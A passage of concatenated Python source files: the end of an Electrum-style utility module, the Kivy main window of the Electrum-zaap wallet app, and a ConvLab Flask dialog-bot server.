except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
class AIOSafeSilentException(Exception): pass
def aiosafe(f):
# save exception in object.
# f must be a method of a PrintError instance.
# aiosafe calls should not be nested
async def f2(*args, **kwargs):
self = args[0]
try:
return await f(*args, **kwargs)
except AIOSafeSilentException as e:
self.exception = e
except asyncio.CancelledError as e:
self.exception = e
except BaseException as e:
self.exception = e
self.print_error("Exception in", f.__name__, ":", e.__class__.__name__, str(e))
try:
traceback.print_exc(file=sys.stderr)
except BaseException as e2:
self.print_error("aiosafe:traceback.print_exc raised: {}... original exc: {}".format(e2, e))
return f2
TxMinedStatus = NamedTuple("TxMinedStatus", [("height", int),
("conf", int),
("timestamp", int),
("header_hash", str)])
VerifiedTxInfo = NamedTuple("VerifiedTxInfo", [("height", int),
("timestamp", int),
("txpos", int),
("header_hash", str)])
def make_aiohttp_session(proxy):
if proxy:
connector = SocksConnector(
socks_ver=SocksVer.SOCKS5 if proxy['mode'] == 'socks5' else SocksVer.SOCKS4,
host=proxy['host'],
port=int(proxy['port']),
username=proxy.get('user', None),
password=proxy.get('password', None),
rdns=True
)
return aiohttp.ClientSession(headers={'User-Agent' : 'Electrum'}, timeout=aiohttp.ClientTimeout(total=10), connector=connector)
else:
return aiohttp.ClientSession(headers={'User-Agent' : 'Electrum'}, timeout=aiohttp.ClientTimeout(total=10))
class SilentTaskGroup(TaskGroup):
def spawn(self, *args, **kwargs):
# don't complain if group is already closed.
if self._closed:
raise asyncio.CancelledError()
return super().spawn(*args, **kwargs)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum_zaap
from electrum_zaap.bitcoin import TYPE_ADDRESS
from electrum_zaap import WalletStorage, Wallet
from electrum_zaap_gui.kivy.i18n import _
from electrum_zaap.paymentrequest import InvoiceStore
from electrum_zaap.util import profiler, InvalidPassword
from electrum_zaap.plugins import run_hook
from electrum_zaap.util import format_satoshis, format_satoshis_plain
from electrum_zaap.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
# lazy imports for factory so that widgets can be used in kv
Factory.register('InstallWizard',
module='electrum_zaap_gui.kivy.uix.dialogs.installwizard')
Factory.register('InfoBubble', module='electrum_zaap_gui.kivy.uix.dialogs')
Factory.register('OutputList', module='electrum_zaap_gui.kivy.uix.dialogs')
Factory.register('OutputItem', module='electrum_zaap_gui.kivy.uix.dialogs')
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_zaap_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_zaap.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_zaap.network import DEFAULT_PORTS
pp = servers.get(host, DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'zaap':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mzaap')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
super(ElectrumWindow, self).__init__(**kwargs)
title = _('Electrum-zaap App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_zaap.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('zaap:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_zaap.transaction import Transaction
try:
text = base_decode(data, None, base=43).encode('hex')
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'requests']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_zaap.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.open()
def qr_dialog(self, title, data, show_text=False):
from uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
intent = Intent("com.google.zxing.client.android.SCAN")
intent.putExtra("SCAN_MODE", "QR_CODE_MODE")
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
try:
PythonActivity.mActivity.startActivityForResult(intent, 0)
except:
self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing'))
def scan_qr_zxing(self, on_complete):
# uses zxing embedded lib
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator')
integrator = IntentIntegrator(PythonActivity.mActivity)
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
integrator.initiateScan()
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for zaap: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum-zaap: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
if self._settings_dialog is None:
from uix.dialogs.settings import SettingsDialog
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_zaap_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_zaap_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.icon = "icons/electrum-zaap.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-zaap', message,
app_icon=icon, app_name='Electrum-zaap')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
def callback(pw):
Clock.schedule_once(lambda _: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
from uix.dialogs.password_dialog import PasswordDialog
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
|
bot_server.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import sys
sys.path.append('../../')
from convlab.agent import Body
from convlab.agent import DialogAgent
from convlab.spec import spec_util
from convlab.env import make_env
import time
import numpy as np
import copy
from flask import Flask, request, jsonify
from queue import PriorityQueue
from threading import Thread
import torch
rgi_queue = PriorityQueue(maxsize=0)
rgo_queue = PriorityQueue(maxsize=0)
app = Flask(__name__)
os.environ['lab_mode'] = 'eval'
spec_file = sys.argv[1]
spec_name = sys.argv[2]
lab_mode = sys.argv[3]
if '@' in lab_mode:
lab_mode, prename = lab_mode.split('@')
spec = spec_util.get_eval_spec(spec_file, spec_name, prename)
else:
spec = spec_util.get(spec_file, spec_name)
# # lab_mode, prename = sys.argv[3].split('@')
# spec = spec_util.get_eval_spec(spec_file, prename)
spec = spec_util.override_eval_spec(spec)
agent_spec = spec['agent'][0]
env = make_env(spec)
body = Body(env, spec['agent'])
agent = DialogAgent(spec, body)
# last_obs = 'hi'
# agent.reset(last_obs)
# obs = 'hi can you find me a hotel in the west?'
# action = agent.act(obs)
# next_obs = 'we have six people'
# agent.update(obs, action, 0, next_obs, 0)
# action = agent.act(next_obs)
global_counter = 0
@app.route('/', methods=['GET', 'POST'])
def process():
global global_counter
try:
in_request = request.json
print(in_request)
except:
return "invalid input: {}".format(in_request)
global_counter += 1
rgi_queue.put((global_counter, in_request))
# rgi_queue.join()
output = rgo_queue.get()
print(output['response'])
rgo_queue.task_done()
# return jsonify({'response': response})
return jsonify(output)
def generate_response(in_queue, out_queue):
while True:
# pop input
last_action = 'null'
_, in_request = in_queue.get()
obs = in_request['input']
if in_request['agent_state'] == {}:
agent.reset(obs)
else:
state, prev_active_domain, context_input_ids, context_input_len = in_request['agent_state']
# agent.body.encoded_state = np.asarray(encoded_state) if isinstance(encoded_state, list) else encoded_state
# agent.dst.state = copy.deepcopy(dst_state)
agent.algorithm.policy.state = copy.deepcopy(state)
agent.algorithm.policy.prev_active_domain = copy.deepcopy(prev_active_domain)
agent.algorithm.policy.context_input_ids = torch.tensor(context_input_ids).to('cuda')#[torch.tensor(i).to('cuda') for i in context_input_ids]
agent.algorithm.policy.context_input_len = torch.tensor(context_input_len).to('cuda')
agent.update(obs, last_action, 0, obs, 0)
try:
action = agent.act(obs)
# encoded_state = agent.body.encoded_state.tolist() if isinstance(agent.body.encoded_state,
# np.ndarray) else agent.body.encoded_state
# dst_state = copy.deepcopy(agent.dst.state)
state = copy.deepcopy(agent.algorithm.policy.state)
prev_active_domain = copy.deepcopy(agent.algorithm.policy.prev_active_domain)
context_input_ids = copy.deepcopy(agent.algorithm.policy.context_input_ids.tolist())#[i.tolist() for i in agent.algorithm.policy.context_input_ids]
context_input_len = copy.deepcopy(agent.algorithm.policy.context_input_len.tolist())
# print(state, prev_active_domain, context_input_ids, context_input_len)
# asdfasdf
except Exception as e:
print('agent error', e)
try:
if action == '':
response = 'Sorry I do not understand, can you paraphrase?'
else:
response = action
except Exception as e:
print('Response generation error', e)
response = 'What did you say?'
last_action = action
out_queue.put({'response': response, 'agent_state': (state, prev_active_domain, context_input_ids, context_input_len)})
in_queue.task_done()
# out_queue.join()
if __name__ == '__main__':
worker = Thread(target=generate_response, args=(rgi_queue, rgo_queue,))
worker.setDaemon(True)
worker.start()
